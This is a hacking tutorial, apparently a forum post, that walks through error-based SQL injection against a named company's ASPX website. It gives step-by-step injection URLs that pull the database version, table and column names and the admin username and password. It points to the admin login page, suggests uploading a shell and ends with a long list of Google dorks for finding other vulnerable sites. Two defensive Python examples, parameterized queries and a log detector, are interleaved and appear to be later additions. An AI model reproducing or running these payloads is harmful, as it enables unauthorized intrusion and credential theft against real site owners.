THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSES AND I AM NOT RESPONSIBLE FOR ANYTHING ILLEGAL YOU DO
I am going to give a tutorial on how to hack an ASPX site.
The procedure is given below.
The URL on which the attack will be done is:
or
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=1
Step 1:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6' having 1=1--
It will give the following error:
Column 'tbl_PRODUCT.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
This means the site is vulnerable: the injected HAVING clause was passed straight into the query, and the error message even leaks a column name (tbl_PRODUCT.id).
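Why the probe above produces a database error is worth seeing in code. The following is an added example (not code from the tutorial or from the site): the vulnerable page pattern pastes the id parameter into the SQL text and hands the raw database error back to the client, while the parameterized and hardened versions treat the same input as data. It uses Python's sqlite3 in memory as a stand-in for SQL Server; the tbl_product table, its rows and the function names are invented for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the product table behind a page like the one
    # above (SQLite in memory instead of SQL Server); schema and rows are invented.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_product (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tbl_product VALUES (?, ?)",
                     [(1, "Engine oil"), (6, "Gear oil")])
    return conn


def vulnerable_lookup(conn, page_id):
    # The pattern the tutorial relies on: the id parameter is pasted into the
    # statement text, and the raw database error is handed back to the client.
    sql = "SELECT name FROM tbl_product WHERE id='" + page_id + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def parameterized_lookup(conn, page_id):
    # Same query, but the value is bound as a parameter: whatever the client
    # sends is compared as data and can never become part of the SQL syntax.
    rows = conn.execute("SELECT name FROM tbl_product WHERE id=?", (page_id,))
    return [row[0] for row in rows]


def hardened_lookup(conn, page_id):
    # Parameter binding plus input validation and a generic error message,
    # so the response gives no oracle for error-based extraction.
    if not page_id.isdigit():
        return "error: invalid id"
    try:
        return parameterized_lookup(conn, int(page_id))
    except sqlite3.Error:
        return "error: request could not be processed"


PROBE = "6' having 1=1--"   # the detection payload from step 1


if __name__ == "__main__":
    conn = make_db()
    for lookup in (vulnerable_lookup, parameterized_lookup, hardened_lookup):
        print(lookup.__name__, "id=6  ->", lookup(conn, "6"))
        print(lookup.__name__, "probe ->", lookup(conn, PROBE))
```

With the probe, the concatenated version yields an SQL error about the HAVING clause (the exact wording depends on the SQLite version, just as the tutorial's message is SQL Server's), the parameterized version simply finds no row, and the hardened version rejects the value before it reaches the database.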
Step 2:
To find the version name, type the following command:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,@@version)--
Output is:
Server Error in '/' Application.
Conversion failed when converting the nvarchar value
'Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86)
Dec 10 2010 10:56:29
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 6.1 (Build 7601: Service
Pack 1)
' to data type int.
Here 'Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29' is the version.
To find the database name, type this:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,db_name())--
Output:
Conversion failed when converting the nvarchar value
'dbsterlite' to data type int.
dbsterlite is the database name.
Finding the username:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 'and 1=convert(int,user_name())--
Output:
Conversion failed when converting the nvarchar value
'db_hoststerlite' to data type int.
db_hoststerlite is the database user name.
Step 3:
Finding table names
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables))--
Output:
Conversion failed when converting the nvarchar value
'tbl_subcategoryname' to data type int
Here the 1st table is 'tbl_subcategoryname'.
Then we have to find the 2nd table:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbl_subcategoryname')))--
Output:
Conversion failed when converting the nvarchar value
'tbl_testimonials' to data type int.
tbl_testimonials is the 2nd table.
For the 3rd table:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbl_subcategoryname','tbl_testimonials')))--
Continue with this type of command until you no longer get any error.
The tables are:
1=tbl_subcategoryname
2=tbl_testimonials
3=tbl_News
4=tbl_advertisement
5=tbl_career
6=tbl_category
7=tbl_classified
8=tbl_inquiry
9=tbl_adminmaster
10=tbl_futureproducts
11=tbl_gallery
12=tbl_product
13=tbl_productphoto
14=tbl_quatation
Here we want the admin name and password, so the table we need is tbl_adminmaster.
Step 4:
Finding column names
For the 1st column:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster'))--
Output:
Conversion failed when converting the nvarchar value 'id' to
data type int.
The 1st column is id.
For the 2nd column:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id')))--
Output:
Conversion failed when converting the nvarchar value
'username' to data type int.
The 2nd column is username.
Then:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id','username')))--
Output:
Conversion failed when converting the nvarchar value
'password' to data type int.
The 3rd column is password.
Continue with this type of command until there is no error.
For example, if we enter the following command:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id','username','password')))--
the page will load correctly without any errors. This means there are only 3 columns in the table 'tbl_adminmaster'.
Step 5:
Extracting the information
After getting the required table name and column names, the following commands can be used to extract the information:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 username from tbl_adminmaster))--
Output:
Conversion failed when converting the varchar value 'admin'
to data type int.
Here username=admin.
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 password from tbl_adminmaster))--
Output:
Conversion failed when converting the varchar value 'admin'
to data type int.
Here password=admin.
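Every request in steps 1 to 5 leaves the same two traces a defender can alert on: a query string carrying the HAVING probe, the convert(int, ...) conversion oracle or information_schema enumeration, and a 500 response whose body is a verbose "Server Error in '/' Application" page. The following is an added example (not code from the tutorial or from the site) that runs those checks over a constructed IIS W3C log excerpt; the log lines, IP addresses, timestamps, signature names and function names are all invented for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log excerpt (invented, not from any real server).
# The query strings have the same shape as the error-based probes shown above.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-10 09:00:01 203.0.113.5 GET /automotive.aspx state=viewpage&id=1 200
2024-01-10 09:00:07 203.0.113.5 GET /automotive.aspx state=viewpage&id=6%27%20having%201=1-- 500
2024-01-10 09:00:15 203.0.113.5 GET /automotive.aspx state=viewpage&id=6%27and%201=convert(int,@@version)-- 500
2024-01-10 09:00:31 203.0.113.5 GET /automotive.aspx state=viewpage&id=6%27and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-- 500
2024-01-10 09:01:02 198.51.100.20 GET /automotive.aspx state=viewpage&id=2 200
2024-01-10 09:01:40 198.51.100.20 GET /contact.aspx - 200
"""

# Request-side signatures of the technique: the HAVING probe, the
# convert(int, ...) type-conversion oracle, schema enumeration, environment
# functions, and a quote followed by a trailing comment.
SIGNATURES = {
    "having_probe": re.compile(r"'\s*having\s+1\s*=\s*1", re.I),
    "convert_oracle": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "env_func": re.compile(r"@@version|db_name\s*\(\s*\)|user_name\s*\(\s*\)", re.I),
    "comment_tail": re.compile(r"'.*--\s*$"),
}

# Response-side markers: the verbose ASP.NET / SQL Server error pages that make
# the extraction possible in the first place (custom errors switched off).
LEAK_MARKERS = ("Server Error in '/' Application",
                "Conversion failed when converting the")


def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split(" ")
            if len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows


def classify_query(raw_query):
    """Decode a logged query string and return it with the signatures it hits."""
    query = "" if raw_query == "-" else unquote_plus(raw_query)
    return query, [name for name, rx in SIGNATURES.items() if rx.search(query)]


def flag_requests(text):
    """Return one finding per request whose query string matches a signature."""
    findings = []
    for row in parse_w3c(text):
        decoded, hits = classify_query(row["cs-uri-query"])
        if hits:
            findings.append({"ip": row["c-ip"], "stem": row["cs-uri-stem"],
                             "status": int(row["sc-status"]),
                             "query": decoded, "signatures": hits})
    return findings


def summarize_by_ip(text):
    """Count flagged requests per client address."""
    counts = {}
    for finding in flag_requests(text):
        counts[finding["ip"]] = counts.get(finding["ip"], 0) + 1
    return counts


def response_leaks_db_error(body):
    """True if a response body carries a raw SQL Server error to the client."""
    return any(marker in body for marker in LEAK_MARKERS)


if __name__ == "__main__":
    for finding in flag_requests(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["signatures"], finding["query"])
    print(summarize_by_ip(SAMPLE_LOG))
```

The query string is URL-decoded before matching, because IIS logs it as received (%27 for the quote, %20 for spaces); a run of several flagged requests from one address that all return 500 is the characteristic shape of this enumeration, and response_leaks_db_error is the check to run against the application's own error pages to confirm the oracle is exposed.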
Then you can find the admin login page by using 'Havij'.
The admin login page is:
http://sterlitelubricants.com/admin/login.aspx
Then, after logging in as admin, you can upload your own shell and do whatever you want. I will explain how to upload your shell in later tutorials.
You can also find this type of vulnerable site with Google dorks.
Examples:
inurl:.asp?sid=
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID="
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="